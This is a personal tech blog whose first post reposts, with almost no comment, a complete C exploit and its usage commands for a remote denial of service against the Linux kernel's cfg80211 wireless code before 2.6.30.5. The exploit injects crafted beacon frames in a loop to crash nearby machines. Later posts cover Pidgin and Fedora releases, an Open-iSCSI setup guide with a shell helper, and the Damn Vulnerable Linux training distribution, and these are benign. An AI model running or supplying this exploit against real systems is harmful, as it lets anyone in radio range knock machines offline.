Xanda's Blog !~!

Linux Kernel < 2.6.30.5 cfg80211 Remote DoS

Aug 18

In case you guys haven’t noticed this vulnerability yet:

/*
 * cfg80211-remote-dos.c
 *
 * Linux Kernel < 2.6.30.5 cfg80211 Remote DoS
 * Jon Oberheide <jon@oberheide.org>
 * http://jon.oberheide.org
 * 
 * Information:
 *
 *   http://patchwork.kernel.org/patch/41218/
 *
 *   These pointers can be NULL, the is_mesh() case isn't ever hit in the 
 *   current kernel, but cmp_ies() can be hit under certain conditions.
 *
 * Usage:
 *
 *   $ gcc cfg80211-remote-dos.c -o cfg80211-remote-dos -lorcon
 *   $ airmon-ng start wlan0
 *   ...
 *   $ ./cfg80211-remote-dos mon0 mac80211
 *   [+] Initializing interface mon0...
 *   [+] Injecting crafted DoS beacon frames...
 *
 * Notes:
 *
 *   The NULL pointer dereference is triggered if the victim scans and receives
 *   a beacon frame that does not contain a SSID IE and then receives another 
 *   one that does have a SSID IE.  Raw frame injection via LORCON is required 
 *   on the wireless interface.  This should only affect the 2.6.30 series.
 */
 
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <time.h>
 
#include <tx80211.h>
#include <tx80211_packet.h>
 
#define BEACON_NOSSID \
	"\x80\x00\x00\x00\xff\xff\xff\xff\xff\xff" \
	"\x00\x03\x52\x00\x00\x00" \
	"\x00\x03\x52\x00\x00\x00" \
	"\x30\x4b" \
	"\x5f\x74\x34\x77\xdb\x03\x00\x00\x64\x00\x21\x04" \
	"\x01\x08\x82\x84\x8b\x96\x0c\x12\x18\x24" \
	"\x03\x01\x07" \
	"\x05\x04\x00\x01\x01\x00" \
	"\x2a\x01\x04" \
	"\x32\x04\x30\x48\x60\x6c"
#define BEACON_NOSSID_LEN 64
 
#define BEACON_SSID \
	"\x80\x00\x00\x00\xff\xff\xff\xff\xff\xff" \
	"\x00\x03\x52\x00\x00\x00" \
	"\x00\x03\x52\x00\x00\x00" \
	"\x30\x4b" \
	"\x5f\x74\x34\x77\xdb\x03\x00\x00\x64\x00\x21\x04" \
	"\x00\x03\x44\x6f\x53" \
	"\x01\x08\x82\x84\x8b\x96\x0c\x12\x18\x24" \
	"\x03\x01\x07" \
	"\x05\x04\x00\x01\x01\x00" \
	"\x2a\x01\x04" \
	"\x32\x04\x30\x48\x60\x6c"
#define BEACON_SSID_LEN 69
 
void
usage(char **argv)
{
	int i;
	struct tx80211_cardlist *cardlist;
 
	printf("Usage: %s [interface] [drivername]\n", argv[0]);
 
	cardlist = tx80211_getcardlist();
 
	if (cardlist == NULL) {
		printf("Error accessing supported cardlist.\n");
	} else {
		printf("\nSupported drivers are: ");
		for (i = 1; i < cardlist->num_cards; i++) {
			printf("%s ", cardlist->cardnames[i]);
		}
		printf("\n");
	}
	tx80211_freecardlist(cardlist);
}
 
int
main(int argc, char **argv)
{
	struct tx80211 tx;
	struct tx80211_packet pkt;
	char p1[BEACON_NOSSID_LEN];
	char p2[BEACON_SSID_LEN];
	int ret, drivertype;
	uint8_t randbyte;
 
	if (argc < 3) {
		usage(argv);
		return 0;
	}
 
	printf("[+] Initializing interface %s...\n", argv[1]);
 
	drivertype = tx80211_resolvecard(argv[2]);
	if (drivertype == INJ_NODRIVER) {
		printf("[-] Driver name not recognized.\n");
		exit(1);
	}
 
	ret = tx80211_init(&tx, argv[1], drivertype);
	if (ret < 0) {
		printf("[-] Error initializing %s/%s", argv[1], argv[2]);
		exit(1);
	}
 
	ret = tx80211_setfunctionalmode(&tx, TX80211_FUNCMODE_INJMON);
	if (ret != 0) {
		printf("[-] Error setting monitor mode.\n");
		printf("[-] %s.\n", tx80211_geterrstr(&tx));
		exit(1);
	}
 
	ret = tx80211_setchannel(&tx, 11);
	if (ret < 0) {
		printf("[-] Error setting channel.\n");
		printf("[-] %s.\n", tx80211_geterrstr(&tx));
		exit(1);
	}
 
	ret = tx80211_open(&tx);
	if (ret < 0) {
		printf("[-] Unable to open interface %s\n", tx.ifname);
		printf("[-] %s.\n", tx80211_geterrstr(&tx));
		exit(1);
	}
 
	srand(time(NULL));
 
	memcpy(p1, BEACON_NOSSID, BEACON_NOSSID_LEN);
	memcpy(p2, BEACON_SSID, BEACON_SSID_LEN);
 
	printf("[+] Injecting crafted DoS beacon frames...\n");
 
	while (1) {
		randbyte = rand() & 0xff;
		p1[15] = randbyte;
		p1[21] = randbyte;
		p2[15] = randbyte;
		p2[21] = randbyte;
 
		pkt.packet = p1;
		pkt.plen = BEACON_NOSSID_LEN;
		if (tx80211_txpacket(&tx, &pkt) < 0) {
			printf("[-] Unable to transmit packet.\n");
			printf("[-] %s.\n", tx80211_geterrstr(&tx));
			exit(1);
		}
 
		pkt.packet = p2;
		pkt.plen = BEACON_SSID_LEN;
		if (tx80211_txpacket(&tx, &pkt) < 0) {
			printf("[-] Unable to transmit packet.\n");
			printf("[-] %s.\n", tx80211_geterrstr(&tx));
			exit(1);
		}
	}
 
	tx80211_close(&tx);
 
	return 0;
}

Source: Milw0rm

Pidgin 2.5.7 Has Been Released

Jun 24

Download

[If you plan to compile it yourself, please refer HERE]

Change log:

  • Yahoo Protocol 16 support, including new HTTPS login method; this should fix a number of login problems that have recently cropped up. (Sulabh Mahajan, Mike “Maiku” Ruprecht)
  • Only display the AIM “Unable to Retrieve Buddy List” message once per connection. (Rob Taft)
  • Blocking MSN users not on your buddy list no longer disconnects you.
  • When performing operations on MSN, assume users are on the MSN/Passport network if we don’t get network IDs for them.

Fedora 11 (Reign) Has Been Released

Jun 10

Release Note

Screenshot Tour

Download

P/S: WordPress 2.8 will be released soon as well. Stay tuned..

Dell EqualLogic PS Series iSCSI SAN Arrays – Storage Area Network

Apr 28

This is not the first time I have dealt with a SAN device, but I had never used one with Ubuntu Linux before. Anyway, there is a first time for everything.

After 15 minutes of playing around with Open-iSCSI (it can be done in just a few seconds on Windows using the GUI-based iSCSI Initiator), here is the how-to (which also serves as a note for myself).

1) Install the Open-iSCSI initiator

sudo apt-get install open-iscsi

2) If you want your computer to connect to the SAN volume manually, proceed with step 3. But if you want it to connect to the volume automatically, edit the iscsid configuration file

sudo nano /etc/iscsi/iscsid.conf

And change the following parameters

  • isns.address = SAN-IP-ADDRESS-HERE
  • isns.port = 3260

3) If access is restricted by IP address (without a password), proceed with step 4. But if a password is required, edit the iscsid configuration file

sudo nano /etc/iscsi/iscsid.conf

And change/set the following parameters

  • node.session.auth.username = USER
  • node.session.auth.password = PASSWORD
  • discovery.sendtargets.auth.username = USER
  • discovery.sendtargets.auth.password = PASSWORD

4) Restart the open-iscsi service

sudo /etc/init.d/open-iscsi restart

5) Run the open-iscsi administration utility with root privileges to discover the available volumes

sudo iscsiadm -m discovery -t sendtargets -p 192.168.10.1

where 192.168.10.1 is the IP address of your SAN. If your configuration is working, you will get something similar to this:

192.168.10.1:3260,1 iqn.2001-05.com.equallogic:0-8a0906-f260b4603-e8b0000001249f55-vss-control
192.168.10.1:3260,1 iqn.2001-05.com.equallogic:0-8a0906-6980b4603-a990000001f49f56-csmvol3
192.168.10.1:3260,1 iqn.2001-05.com.equallogic:0-8a0906-58c0b4603-1730000001c49f56-csmvol2
192.168.10.1:3260,1 iqn.2001-05.com.equallogic:0-8a0906-4280b4603-a410000001949f56-csmvol1

6) In this case, I want to connect to volume 1 (iqn.2001-05.com.equallogic:0-8a0906-4280b4603-a410000001949f56-csmvol1), so here is what I do

sudo iscsiadm --mode node --targetname iqn.2001-05.com.equallogic:0-8a0906-4280b4603-a410000001949f56-csmvol1 --portal 192.168.10.1:3260 --login

And if you are successfully connected, you’ll get the following message

Logging in to [iface: default, target: iqn.2001-05.com.equallogic:0-8a0906-4280b4603-a410000001949f56-csmvol1, portal: 192.168.10.1,3260]
Login to [iface: default, target: iqn.2001-05.com.equallogic:0-8a0906-4280b4603-a410000001949f56-csmvol1, portal: 192.168.10.1,3260]: successful

7) Now, check which device name the volume has been attached as on your machine

tail -f /var/log/messages

And in my case, this is my output

Apr 28 09:42:48 xps kernel: [ 2514.014658] scsi 6:0:0:0: Direct-Access     EQLOGIC  100E-00          4.0  PQ: 0 ANSI: 5
Apr 28 09:42:48 xps kernel: [ 2514.016499] sd 6:0:0:0: [sdb] 209725440 512-byte hardware sectors: (107 GB/100 GiB)
Apr 28 09:42:48 xps kernel: [ 2514.017832] sd 6:0:0:0: [sdb] Write Protect is off
Apr 28 09:42:48 xps kernel: [ 2514.018256] sd 6:0:0:0: [sdb] Write cache: disabled, read cache: enabled, doesn't support DPO or FUA
Apr 28 09:42:48 xps kernel: [ 2514.019240] sd 6:0:0:0: [sdb] 209725440 512-byte hardware sectors: (107 GB/100 GiB)
Apr 28 09:42:48 xps kernel: [ 2514.019434] sd 6:0:0:0: [sdb] Write Protect is off
Apr 28 09:42:48 xps kernel: [ 2514.019836] sd 6:0:0:0: [sdb] Write cache: disabled, read cache: enabled, doesn't support DPO or FUA
Apr 28 09:42:48 xps kernel: [ 2514.019842]  sdb: sdb1
Apr 28 09:42:48 xps kernel: [ 2514.024882] sd 6:0:0:0: [sdb] Attached SCSI disk
Apr 28 09:42:48 xps kernel: [ 2514.026039] sd 6:0:0:0: Attached scsi generic sg2 type 0

The connected volume appears as sdb on my machine.

8) If the volume already contains a partition and is already formatted, you can mount it straight away; if it does not have a partition and filesystem yet, use either fdisk or gparted to create the partition and format it 😉

Enjoy..!~

Example fdisk -l output:

Disk /dev/sda: 160.0 GB, 160041885696 bytes
255 heads, 63 sectors/track, 19457 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Disk identifier: 0x12961295
 
   Device Boot      Start         End      Blocks   Id  System
/dev/sda1               1          12       96358+  de  Dell Utility
/dev/sda2   *          13        7661    61440592+   7  HPFS/NTFS
/dev/sda3            7662       11396    30001387+   b  W95 FAT32
/dev/sda4           11397       19457    64749982+   5  Extended
/dev/sda5           11397       11520      995998+  82  Linux swap / Solaris
/dev/sda6           11521       19457    63753921   83  Linux
 
Disk /dev/sdb: 107.3 GB, 107379425280 bytes
255 heads, 63 sectors/track, 13054 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Disk identifier: 0x00093e08
 
   Device Boot      Start         End      Blocks   Id  System
/dev/sdb1               1       13054   104856223+  83  Linux

[Reference: Cyberciti & Ubuntu Forum]
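As an added example (not from the original post or from the Open-iSCSI project), the shell functions below automate two small pieces of the procedure above: picking the right target IQN for a named EqualLogic volume out of the step-5 discovery output and building the step-6 login command from it, plus a permission check on iscsid.conf, since the CHAP username and password from step 3 sit in that file in clear text. The discovery lines are a constructed sample copied from the post's output, and the permission check assumes GNU coreutils stat.

```shell
#!/bin/sh
# Constructed sample of the `iscsiadm -m discovery -t sendtargets` output from step 5.
SAMPLE_TARGETS='192.168.10.1:3260,1 iqn.2001-05.com.equallogic:0-8a0906-f260b4603-e8b0000001249f55-vss-control
192.168.10.1:3260,1 iqn.2001-05.com.equallogic:0-8a0906-6980b4603-a990000001f49f56-csmvol3
192.168.10.1:3260,1 iqn.2001-05.com.equallogic:0-8a0906-58c0b4603-1730000001c49f56-csmvol2
192.168.10.1:3260,1 iqn.2001-05.com.equallogic:0-8a0906-4280b4603-a410000001949f56-csmvol1'

# find_target VOLNAME: print the IQN whose name ends in "-VOLNAME"; fail if none.
# Matching on the exact suffix keeps "csmvol1" from also matching "csmvol10".
find_target() {
    vol=$1
    printf '%s\n' "$SAMPLE_TARGETS" | awk -v want="-$vol" '
        {
            iqn = $2; n = length(want)
            if (substr(iqn, length(iqn) - n + 1) == want) { print iqn; found = 1; exit }
        }
        END { exit found ? 0 : 1 }'
}

# login_cmd VOLNAME PORTAL: print the step-6 login command for that volume.
login_cmd() {
    iqn=$(find_target "$1") || return 1
    printf 'sudo iscsiadm --mode node --targetname %s --portal %s --login\n' "$iqn" "$2"
}

# check_conf_perms FILE: iscsid.conf holds the CHAP secrets from step 3 in clear
# text, so succeed only when group and others have no access bits at all
# (e.g. mode 600 or 400). Uses GNU `stat -c`.
check_conf_perms() {
    f=$1
    [ -f "$f" ] || return 1
    mode=$(stat -c '%a' "$f" 2>/dev/null) || return 1
    case "$mode" in
        ?00) return 0 ;;
        *)   return 1 ;;
    esac
}
```

Replace the SAMPLE_TARGETS literal with the real discovery output (for example `iscsiadm -m discovery -t sendtargets -p 192.168.10.1`) to use it against your own SAN.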

Damn Vulnerable Linux (DVL)

Mar 10

Damn Vulnerable Linux (DVL) is a Slackware- and Slax-based live DVD purposefully stuffed with broken, ill-configured, outdated and exploitable software. It began life as a training system used during the author’s university lectures.

Its primary goal is to design a Linux system that is as vulnerable as possible — in order to teach and demonstrate a variety of security topics, including reverse code engineering, buffer overflows, shell code development, web exploitation, and SQL injection.

It contains older, easily breakable versions of Apache, MySQL, PHP, and FTP and SSH daemons, as well as several tools available to help you compile, debug, and break applications running on these services, including GCC, GDB, NASM, strace, ELF Shell, DDD, LDasm, LIDa, and more.

So if you are looking for a new playground, DVL is a good choice for you.